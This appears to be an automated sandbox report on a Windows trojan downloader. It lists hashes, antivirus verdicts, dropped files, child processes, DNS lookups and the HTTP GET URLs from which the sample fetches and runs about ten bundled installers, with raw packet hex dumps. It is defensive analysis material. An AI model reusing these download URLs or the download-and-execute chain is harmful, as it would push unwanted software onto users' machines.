Analysis Date: 2015-08-22 03:15:43
MD5: 9a11a6b09ef5382d6c0b3da15a5d1bc2
SHA1: 60ed4e01cd8f7a6e91ea99b8741ac40c0f7e7552

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 9cb827c88315cd4225f5b8e9205a1cac sha1: 54d67fd8eba2ab9b84cce2d5e057adebf478e85b size: 350208
Section .rdata md5: 34f61441e9b948ac30a12599bed5fc58 sha1: 9d1591b81a7467d599a8a9d09a51224596fa6b2e size: 82432
Section .data md5: a02e7e870b848a8c34673cb856a41534 sha1: bdecc977794de401db36bdaa2f05c6963db993ad size: 6656
Section .rsrc md5: e5f43a9c8970e68cd977a6750e5efa86 sha1: 5cb1670e1ec7972ad514489013e6c1c5503efa88 size: 67072
Section .reloc md5: 164f08785df275b5c41f26ca27a089a1 sha1: 7b1ff2b7a66234dd01319c997880fca040422898 size: 14848
Timestamp: 2015-07-28 07:11:00
Pdb path: C:\Users\Administrator\Desktop\setup_simple_2015-7-27\setup_simple_变统计位置\Release\File_5_77oddd.pdb
Packer: Microsoft Visual C++ ?.?
PEhash: 7beca87042333b385a5fd3990108a63efd6ec5ba
IMPhash: 5cdd62a0ea9c7b3a71d3773ce9c7c9a4
AV K7: Trojan-Downloader ( 004c98251 )
AV Dr. Web: Trojan.DownLoader15.15098
AV Trend Micro: no_virus
AV BullGuard: no_virus
AV ClamAV: no_virus
AV Eset (nod32): Win32/TrojanDownloader.Agent.BPH
AV Grisoft (avg): Downloader.Generic14.ACYN
AV Arcabit (arcavir): no_virus
AV Kaspersky: no_virus
AV Padvish: no_virus
AV Fortinet: W32/Agent.BPH!tr.dldr
AV Rising: no_virus
AV Symantec: Downloader
AV BitDefender: no_virus
AV Alwil (avast): Trojan-gen:Win32:Trojan-gen
AV CA (E-Trust Ino): no_virus
AV MalwareBytes: no_virus
AV Authentium: W32/S-33c71ac4!Eldorado
AV CAT (quickheal): no_virus
AV MicroWorld (escan): no_virus
AV Emsisoft: no_virus
AV F-Secure: no_virus
AV VirusBlokAda (vba32): Backdoor.Zegost
AV Avira (antivir): TR/Dldr.Agent.524467
AV Ad-Aware: no_virus
AV Ikarus: Trojan-Downloader.Win32.Agent
AV Frisk (f-prot): no_virus
AV Twister: no_virus
AV Zillya!: Downloader.Agent.Win32.271516
AV Mcafee: GenericR-ECB!9A11A6B09EF5
AV Microsoft Security Essentials: SoftwareBundler:Win32/Tupseg

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\IQIYIsetup_l_spl004@kb010.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\install_124_1.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\setup_a1474.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\pp2.0_ad_dubo_Installer.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\setup_30004.exe
Creates File: PHYSICALDRIVE0
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\duba_10_2.exe
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Setup_Y_21.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\160wifi_wcid-6074.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\59wan_1139.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\hdzy_sr_108_thx.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\IQIYIsetup_l_spl004@kb010.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\hdzy_sr_108_thx.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\setup_30004.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\160wifi_wcid-6074.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\59wan_1139.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Setup_Y_21.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\duba_10_2.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\pp2.0_ad_dubo_Installer.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\setup_a1474.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\install_124_1.exe
Creates Mutex: Setupfgdf
Winsock DNS: 1.hnsununion.com
Winsock DNS: dl.yunuq.com
Winsock DNS: dl.static.iqiyi.com
Winsock DNS: ghost.25pp.com
Winsock DNS: down.shijiakai.net
Winsock DNS: down.dreamerv.com
Winsock DNS: res.maoha.com
Winsock DNS: cd001.www.duba.net
Winsock DNS: d.juezhao123.com
Winsock DNS: down.sui17.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\setup_a1474.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scs2.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\SETUP_~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs1.tmp
Deletes File: C:\WINDOWS\TEMP\scs1.tmp
Deletes File: C:\WINDOWS\TEMP\scs2.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\install_124_1.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\INSTAL~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\TEMP\scs4.tmp
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs3.tmp
Deletes File: C:\WINDOWS\TEMP\scs4.tmp
Deletes File: C:\WINDOWS\TEMP\scs3.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\hdzy_sr_108_thx.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\HDZY_S~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scs5.tmp
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs6.tmp
Deletes File: C:\WINDOWS\TEMP\scs5.tmp
Deletes File: C:\WINDOWS\TEMP\scs6.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\setup_30004.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs8.tmp
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scs7.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\SETUP_~2.EXE
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File: C:\WINDOWS\TEMP\scs8.tmp
Deletes File: C:\WINDOWS\TEMP\scs7.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\IQIYIsetup_l_spl004@kb010.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\TEMP\scsA.tmp
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\IQIYIS~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs9.tmp
Deletes File: C:\WINDOWS\TEMP\scsA.tmp
Deletes File: C:\WINDOWS\TEMP\scs9.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\59wan_1139.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\TEMP\scsC.tmp
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scsB.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\59WAN_~1.EXE
Deletes File: C:\WINDOWS\TEMP\scsC.tmp
Deletes File: C:\WINDOWS\TEMP\scsB.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\duba_10_2.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Setup_Y_21.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\SETUP_~3.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scsD.tmp
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\TEMP\scsE.tmp
Deletes File: C:\WINDOWS\TEMP\scsD.tmp
Deletes File: C:\WINDOWS\TEMP\scsE.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\160wifi_wcid-6074.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\160WIF~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scsF.tmp
Creates File: C:\WINDOWS\TEMP\scs10.tmp
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File: C:\WINDOWS\TEMP\scsF.tmp
Deletes File: C:\WINDOWS\TEMP\scs10.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\pp2.0_ad_dubo_Installer.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\TEMP\scs12.tmp
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs11.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\PP20_A~1.EXE
Deletes File: C:\WINDOWS\TEMP\scs12.tmp
Deletes File: C:\WINDOWS\TEMP\scs11.tmp

Network Details:

DNS: down.shijiakai.net
Type: A
58.220.21.68
DNS: down.sui17.com
Type: A
58.218.199.228
DNS: dl.yunuq.com
Type: A
120.26.74.125
DNS: d.juezhao123.com
Type: A
58.222.24.189
DNS: download.pps.tv.webscache.com
Type: A
119.188.40.81
DNS: down.dreamerv.com
Type: A
122.224.10.16
DNS: cc00036.h.cncssr.chinacache.net
Type: A
183.95.152.96
DNS: cc00036.h.cncssr.chinacache.net
Type: A
222.142.57.4
DNS: cc00036.h.cncssr.chinacache.net
Type: A
222.142.57.38
DNS: cc00036.h.cncssr.chinacache.net
Type: A
124.67.23.140
DNS: p23.tcdn.qq.com
Type: A
182.118.124.195
DNS: p23.tcdn.qq.com
Type: A
182.118.124.209
DNS: p23.tcdn.qq.com
Type: A
182.118.124.210
DNS: p23.tcdn.qq.com
Type: A
27.221.21.210
DNS: p23.tcdn.qq.com
Type: A
42.48.109.19
DNS: p23.tcdn.qq.com
Type: A
42.56.64.27
DNS: p23.tcdn.qq.com
Type: A
42.56.65.19
DNS: p23.tcdn.qq.com
Type: A
42.56.65.20
DNS: p23.tcdn.qq.com
Type: A
101.71.72.151
DNS: p23.tcdn.qq.com
Type: A
113.6.237.65
DNS: p23.tcdn.qq.com
Type: A
113.6.237.66
DNS: p23.tcdn.qq.com
Type: A
119.188.71.93
DNS: p23.tcdn.qq.com
Type: A
119.188.94.63
DNS: p23.tcdn.qq.com
Type: A
123.129.203.146
DNS: p23.tcdn.qq.com
Type: A
123.155.153.146
DNS: 1st.dl.ourdvs.com
Type: A
171.107.186.80
DNS: 1st.dtwscachev1.ourwebcdn.com
Type: A
115.231.159.73
DNS: dl.static.iqiyi.com
Type: A
DNS: cd001.www.duba.net
Type: A
DNS: 1.hnsununion.com
Type: A
DNS: res.maoha.com
Type: A
DNS: ghost.25pp.com
Type: A
HTTP GET: http://down.shijiakai.net:81/setup_a1474.exe
User-Agent:
HTTP GET: http://down.sui17.com/UserFiles/install_124_1.exe
User-Agent:
HTTP GET: http://dl.yunuq.com/hdzy_sr_108_thx.exe
User-Agent:
HTTP GET: http://d.juezhao123.com/setup/setup_30004.exe
User-Agent:
HTTP GET: http://dl.static.iqiyi.com/hz/IQIYIsetup_l_spl004@kb010.exe
User-Agent:
HTTP GET: http://down.dreamerv.com/pack/59wan_1139.exe
User-Agent:
HTTP GET: http://cd001.www.duba.net/duba/install/2011/ever/duba_10_2.exe
User-Agent:
HTTP GET: http://1.hnsununion.com/Setup_Y_21.exe
User-Agent:
HTTP GET: http://res.maoha.com/soft/160wifi/160wifi_wcid-6074.exe
User-Agent:
HTTP GET: http://ghost.25pp.com/soft/pppc_setup/pp2.0_ad_dubo_Installer.exe
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 58.220.21.68:81
Flows TCP: 192.168.1.1:1032 ➝ 58.218.199.228:80
Flows TCP: 192.168.1.1:1033 ➝ 120.26.74.125:80
Flows TCP: 192.168.1.1:1034 ➝ 58.222.24.189:80
Flows TCP: 192.168.1.1:1035 ➝ 119.188.40.81:80
Flows TCP: 192.168.1.1:1036 ➝ 122.224.10.16:80
Flows TCP: 192.168.1.1:1037 ➝ 183.95.152.96:80
Flows TCP: 192.168.1.1:1038 ➝ 182.118.124.195:80
Flows TCP: 192.168.1.1:1039 ➝ 171.107.186.80:80
Flows TCP: 192.168.1.1:1040 ➝ 115.231.159.73:80

Raw Pcap
0x00000000 (00000)   47455420 2f736574 75705f61 31343734   GET /setup_a1474
0x00000010 (00016)   2e657865 20485454 502f312e 310d0a48   .exe HTTP/1.1..H
0x00000020 (00032)   6f73743a 20646f77 6e2e7368 696a6961   ost: down.shijia
0x00000030 (00048)   6b61692e 6e65743a 38310d0a 41636365   kai.net:81..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a0d0a              pt: */*....

0x00000000 (00000)   47455420 2f557365 7246696c 65732f69   GET /UserFiles/i
0x00000010 (00016)   6e737461 6c6c5f31 32345f31 2e657865   nstall_124_1.exe
0x00000020 (00032)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000030 (00048)   20646f77 6e2e7375 6931372e 636f6d0d    down.sui17.com.
0x00000040 (00064)   0a416363 6570743a 202a2f2a 0d0a0d0a   .Accept: */*....
0x00000050 (00080)                                         

0x00000000 (00000)   47455420 2f68647a 795f7372 5f313038   GET /hdzy_sr_108
0x00000010 (00016)   5f746878 2e657865 20485454 502f312e   _thx.exe HTTP/1.
0x00000020 (00032)   310d0a48 6f73743a 20646c2e 79756e75   1..Host: dl.yunu
0x00000030 (00048)   712e636f 6d0d0a41 63636570 743a202a   q.com..Accept: *
0x00000040 (00064)   2f2a0d0a 0d0a743a 202a2f2a 0d0a0d0a   /*....t: */*....
0x00000050 (00080)                                         

0x00000000 (00000)   47455420 2f736574 75702f73 65747570   GET /setup/setup
0x00000010 (00016)   5f333030 30342e65 78652048 5454502f   _30004.exe HTTP/
0x00000020 (00032)   312e310d 0a486f73 743a2064 2e6a7565   1.1..Host: d.jue
0x00000030 (00048)   7a68616f 3132332e 636f6d0d 0a416363   zhao123.com..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a0d0a 0d0a0d0a   ept: */*........
0x00000050 (00080)                                         

0x00000000 (00000)   47455420 2f687a2f 49514959 49736574   GET /hz/IQIYIset
0x00000010 (00016)   75705f6c 5f73706c 30303440 6b623031   up_l_spl004@kb01
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   486f7374 3a20646c 2e737461 7469632e   Host: dl.static.
0x00000040 (00064)   69716979 692e636f 6d0d0a41 63636570   iqiyi.com..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 0d0a                t: */*....

0x00000000 (00000)   47455420 2f706163 6b2f3539 77616e5f   GET /pack/59wan_
0x00000010 (00016)   31313339 2e657865 20485454 502f312e   1139.exe HTTP/1.
0x00000020 (00032)   310d0a48 6f73743a 20646f77 6e2e6472   1..Host: down.dr
0x00000030 (00048)   65616d65 72762e63 6f6d0d0a 41636365   eamerv.com..Acce
0x00000040 (00064)   70743a20 2a2f2a0d 0a0d0a41 63636570   pt: */*....Accep
0x00000050 (00080)   743a202a 2f2a0d0a 0d0a                t: */*....

0x00000000 (00000)   47455420 2f647562 612f696e 7374616c   GET /duba/instal
0x00000010 (00016)   6c2f3230 31312f65 7665722f 64756261   l/2011/ever/duba
0x00000020 (00032)   5f31305f 322e6578 65202048 5454502f   _10_2.exe  HTTP/
0x00000030 (00048)   312e310d 0a486f73 743a2063 64303031   1.1..Host: cd001
0x00000040 (00064)   2e777777 2e647562 612e6e65 740d0a41   .www.duba.net..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 0d0a       ccept: */*....

0x00000000 (00000)   47455420 2f536574 75705f59 5f32312e   GET /Setup_Y_21.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000020 (00032)   73743a20 312e686e 73756e75 6e696f6e   st: 1.hnsununion
0x00000030 (00048)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x00000040 (00064)   2a0d0a0d 0a647562 612e6e65 740d0a41   *....duba.net..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 0d0a       ccept: */*....

0x00000000 (00000)   47455420 2f736f66 742f3136 30776966   GET /soft/160wif
0x00000010 (00016)   692f3136 30776966 695f7763 69642d36   i/160wifi_wcid-6
0x00000020 (00032)   3037342e 65786520 48545450 2f312e31   074.exe HTTP/1.1
0x00000030 (00048)   0d0a486f 73743a20 7265732e 6d616f68   ..Host: res.maoh
0x00000040 (00064)   612e636f 6d0d0a41 63636570 743a202a   a.com..Accept: *
0x00000050 (00080)   2f2a0d0a 0d0a202a 2f2a0d0a 0d0a       /*.... */*....

0x00000000 (00000)   47455420 2f736f66 742f7070 70635f73   GET /soft/pppc_s
0x00000010 (00016)   65747570 2f707032 2e305f61 645f6475   etup/pp2.0_ad_du
0x00000020 (00032)   626f5f49 6e737461 6c6c6572 2e657865   bo_Installer.exe
0x00000030 (00048)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000040 (00064)   2067686f 73742e32 3570702e 636f6d0d    ghost.25pp.com.
0x00000050 (00080)   0a416363 6570743a 202a2f2a 0d0a0d0a   .Accept: */*....
0x00000060 (00096)                                         


Strings